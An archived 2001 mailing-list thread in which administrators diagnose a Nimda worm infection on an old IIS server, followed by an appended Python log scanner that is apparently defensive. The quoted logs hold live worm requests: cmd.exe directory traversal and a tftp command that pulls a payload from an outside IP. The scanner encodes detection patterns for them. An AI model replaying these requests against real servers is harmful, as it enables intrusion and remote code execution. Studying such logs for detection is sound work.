RE: [RE: [RE: Any leads?]]

From: victoria.evans@private
Date: Fri Sep 21 2001 - 15:47:48 PDT


    Here it is....
    
    IIS Lockdown Tool
    
      Microsoft has released a new security tool that makes it simple to secure an
      IIS 4.0 or 5.0 web server. The tool, known as the IIS Lockdown Tool, allows
      web servers to quickly and easily be put into the right configuration: one in
      which the server provides all of the services the administrator wants to
      provide, and no others. Customers can use this tool to instantly protect
      their systems against security threats that target web servers.
    
      The tool offers two operating modes. The default is Express Lockdown which,
      with a single mouse click, configures the server in a highly secure way that
      is appropriate for most basic web servers. For administrators who want to
      pick and choose the technologies that will be enabled on the server, the tool
      offers an Advanced Lockdown mode. A comprehensive help system provides
      information and recommendations for selecting the best configuration, and an
      undo facility allows the most recent lockdown to be reversed.
    
      Wondering whether it's worth the time to use the tool? Consider this: a web
      server configured using the Express Lockdown would be completely protected
      against Code Red and virtually all known security vulnerabilities affecting
      IIS 4.0 and 5.0, even without the patches for these vulnerabilities. We do,
      of course, recommend that all customers, even those running locked-down
      servers, continue to stay current on all security patches, but this vividly
      illustrates the value of the tool.
    
      The tool is available for downloading at
      http://www.microsoft.com/Downloads/Release.asp?ReleaseID=32362
    
    
                                                                                                                                    
    dldean@private
    Sent by: owner-crime@/var/spool/majordomo/lists/crime
    09/21/2001 02:46 PM
    To:      "J.Michael Cuciti" <mcuciti@private>, "Kuo Jimmy" <Jimmy_Kuo@private>
    cc:      crime@private
    Subject: RE: [RE: [RE: Any leads?]]
    
    Mike,
    
    Here is a good starting place
    
    http://www.microsoft.com/technet/treeview/default.asp?url=/technet/itsolutio
    
    
    This link is for a Microsoft TechNet page describing security issues for web
    sites. They also have a "batten down the hatches" script for IIS but I
    cannot find the url for that page.
    
    
    Doug
    > -----Original Message-----
    > From: owner-crime@/var/spool/majordomo/lists/crime
    > [mailto:owner-crime@/var/spool/majordomo/lists/crime]On Behalf Of
    > J.Michael Cuciti
    > Sent: Friday, September 21, 2001 2:33 PM
    > To: dldean; Kuo Jimmy
    > Cc: crime@private
    > Subject: Re: [RE: [RE: Any leads?]]
    >
    >
    > Yes, I am 206.98.124.52.  The ADMIN.DLL file was deleted and the
    > directories the event view is referencing do not exist on my system. I
    > have followed all instructions for removal from various postings from
    > CRIME.  No file referenced in the postings is on my system.
    >
    > Do any of you know how I might stop this attack?
    >
    > -Mike
    >
    >
    >
    > dldean@private (dldean) wrote:
    > This is 206.98.124.52 receiving get requests for the admin.dll from
    > 206.98.79.246  and directory requests for his machine from
    > 206.252.224.50 &
    > 208.238.181.162 .
    >
    > Doug
    >
    > > -----Original Message-----
    > > From: owner-crime@/var/spool/majordomo/lists/crime
    > > [mailto:owner-crime@/var/spool/majordomo/lists/crime]On Behalf Of Kuo,
    > > Jimmy
    > > Sent: Friday, September 21, 2001 2:06 PM
    > > Cc: crime@private
    > > Subject: RE: [RE: Any leads?]
    > >
    > >
    > > Oh, I didn't notice the followup questions you asked the first time.
    > >
    > > I don't know about the structure of your logs.  But are you
    > > 206.98.124.52?
    > >
    > > Could someone who reads IIS logs say if this is him sending or
    > > receiving GETs?
    > >
    > > And this is definitely Nimda.  I just don't know if you're the
    > > target or the culprit.  If you haven't upgraded, I'm tempted to believe
    > > you're infected and attacking others.  The TFTP command shows up only
    > > on or after infection.  And ADMIN.DLL (Nimda is admin spelt backwards)
    > > is also something that shows up after infection.  But then you say you
    > > don't have it...
    > >
    > > Jimmy
    > >
    > > > -----Original Message-----
    > > > From:    J.Michael Cuciti [SMTP:mcuciti@private]
    > > > Sent:    Friday, September 21, 2001 1:44 PM
    > > > To: Kuo Jimmy; Crispin Cowan; Jimmy Sadri
    > > > Cc: crime@private
    > > > Subject: Re: [RE: Any leads?]
    > > >
    > > > All:
    > > >
    > > > I still have a script trying to run, but the location and folder
    > > > doesn't exist.  This is what I found in my log file:
    > > >
    > > > 206.98.79.246, -, 9/18/01, 7:29:26, W3SVC, WWW, 206.98.124.52, 150, 151, 304, 200, 0, GET, /scripts/..%2f../winnt/system32/cmd.exe, /c+tftp%20-i%20206.98.79.246%20GET%20Admin.dll%20c:\Admin.dll,
    > > >
    > > > 206.98.79.246, -, 9/18/01, 7:29:27, W3SVC, WWW, 206.98.124.52, 180, 151, 304, 200, 0, GET, /scripts/..%2f../winnt/system32/cmd.exe, /c+tftp%20-i%20206.98.79.246%20GET%20Admin.dll%20d:\Admin.dll,
    > > >
    > > > 206.252.224.50, -, 9/18/01, 7:29:33, W3SVC, WWW, 206.98.124.52, 10, 72, 273, 403, 5, GET, /scripts/root.exe, /c+dir,
    > > >
    > > > 206.252.224.50, -, 9/18/01, 7:29:38, W3SVC, WWW, 206.98.124.52, 80, 96, 1652, 200, 0, GET, /scripts/..%5c../winnt/system32/cmd.exe, /c+dir,
    > > >
    > > > 208.238.181.162, -, 9/18/01, 7:29:46, W3SVC, WWW, 206.98.124.52, 10, 97, 243, 500, 123, GET, /scripts/..A../winnt/system32/cmd.exe, /c+dir,
    > > >
    > > > If anybody knows what this is, please 'spain it to me.
    > > >
    > > > I am running IIS 3.0, NT4.0 w/sp3 (haven't upgraded, I inherited
    > > > this, not my fault :-) )
    > > >
    > > > In the event log I see this same type of message running every few
    > > > minutes.  The script is supposedly running from
    > > > \winnt\iisadmin\Scripts\..%5c..\admin.dll.  This does not exist.
    > > >
    > > > Thanks...
    > > >
    > > > Mike Cuciti
    > > > Network Service and Support Manager
    > > > Tuality Healthcare
    > > > 681.1749
    > > >
    > > >
    > > > "Kuo, Jimmy" <Jimmy_Kuo@private> wrote:
    > > > >The Melissa author was caught because he posted the infectious
    > > > >document from his own AOL account to a news group, rather than
    > > > >releasing it through a hacked account. His guilt was confirmed when
    > > > >the serial number in the document matched the PC in the dumpster
    > > > >outside his bedroom :-)
    > > >
    > > > No.  He used a hacked acct.  But we identified the exact time of the
    > > > use of the acct (newsgroup posting message ID) and the FBI traced the
    > > > phone records.
    > > >
    > > > And the PC was destroyed and never located.
    > > >
    > > > Where did you get your version of the story?
    > > >
    > > > >But Code Red and its derivatives are not Office documents, and
    > > > >therefore have no serial numbers. That investigators appear to have
    > > > >no leads months after Code Red appeared tells me that it was likely
    > > > >released to the wild from a compromised machine, or perhaps
    > > > >simultaneously released from multiple compromised machines. If the
    > > > >author(s) were good, then those compromised machines were initially
    > > > >attacked from other compromised machines. Likely all of these
    > > > >initial release vector machines have long since been wiped and
    > > > >re-installed, and the links to the author(s) have been cut.
    > > >
    > > > We have some "first instances" of traffic.  I don't know what the
    > > > FBI's doing with the information gathered so far.  But I agree that
    > > > it's difficult and not likely.
    > > >
    > > > Jimmy
    > >
    >
    >
    >
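As an added example, not part of the thread or of any tool it mentions, here is a Python scan over a constructed copy of the log lines quoted above (plus one benign request) that answers Jimmy's question about direction: it parses the Microsoft IIS log format, decodes the %2f/%5c traversal encodings, flags the cmd.exe/root.exe probes and the tftp payload fetch, and compares the client and server-IP fields against the host's own address to say whether that host is receiving or sending the requests. The `Finding` class and function names are my own assumptions.

```python
from dataclasses import dataclass
from urllib.parse import unquote

# Constructed sample rebuilt from the log lines quoted above, plus one benign hit.
# Microsoft IIS log format: client IP, user, date, time, service, server name,
# server IP, time taken, bytes recv, bytes sent, status, win32 status, method, stem, query.
SAMPLE_LOG = r"""206.98.79.246, -, 9/18/01, 7:29:26, W3SVC, WWW, 206.98.124.52, 150, 151, 304, 200, 0, GET, /scripts/..%2f../winnt/system32/cmd.exe, /c+tftp%20-i%20206.98.79.246%20GET%20Admin.dll%20c:\Admin.dll,
206.252.224.50, -, 9/18/01, 7:29:33, W3SVC, WWW, 206.98.124.52, 10, 72, 273, 403, 5, GET, /scripts/root.exe, /c+dir,
206.252.224.50, -, 9/18/01, 7:29:38, W3SVC, WWW, 206.98.124.52, 80, 96, 1652, 200, 0, GET, /scripts/..%5c../winnt/system32/cmd.exe, /c+dir,
208.238.181.162, -, 9/18/01, 7:29:46, W3SVC, WWW, 206.98.124.52, 10, 97, 243, 500, 123, GET, /scripts/..A../winnt/system32/cmd.exe, /c+dir,
10.0.0.7, -, 9/18/01, 7:30:01, W3SVC, WWW, 206.98.124.52, 5, 80, 4000, 200, 0, GET, /index.htm, -,
"""

@dataclass
class Finding:
    client_ip: str  # first field: who sent the request
    server_ip: str  # seventh field: who received it
    status: int     # HTTP status: 200 means the request was served, 403/500 that it was not
    kind: str       # "payload-fetch" or "command-probe"
    detail: str

def parse_iis_line(line):
    """Split one IIS-format line into the fields we need, with the URI decoded."""
    fields = [f.strip() for f in line.split(",")]
    if len(fields) < 15:
        return None
    return {"client": fields[0], "server": fields[6], "status": int(fields[10]),
            "stem": unquote(fields[13]).lower(),  # %2f -> '/', %5c -> '\'
            "query": unquote(fields[14].replace("+", " ")).lower()}

def classify(rec):
    """Return a Finding for a worm-style request, or None for ordinary traffic."""
    stem, query = rec["stem"], rec["query"]
    traversal_shell = stem.endswith("cmd.exe") and ".." in stem  # escape out of /scripts
    if not (traversal_shell or stem.endswith("root.exe")):      # root.exe: cmd.exe copy left by earlier worms
        return None
    if "tftp" in query and " get " in query:                    # stage 2: pulling the payload
        return Finding(rec["client"], rec["server"], rec["status"], "payload-fetch",
                       "tftp download of " + query.split()[-2])
    return Finding(rec["client"], rec["server"], rec["status"], "command-probe", query)  # stage 1

def scan(log_text, my_ip):
    """Flag worm-style requests and report whether my_ip is sending or receiving them."""
    findings = []
    for line in log_text.splitlines():
        if (rec := parse_iis_line(line)) and (hit := classify(rec)):
            findings.append(hit)
    inbound = [f for f in findings if f.server_ip == my_ip]
    outbound = [f for f in findings if f.client_ip == my_ip]
    return findings, inbound, outbound
```

On the quoted lines 206.98.124.52 appears only in the server-IP field, so the scan reports every hit as inbound: the host is the target of the probes, not their source.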
    



    This archive was generated by hypermail 2b30 : Sun May 26 2002 - 11:25:50 PDT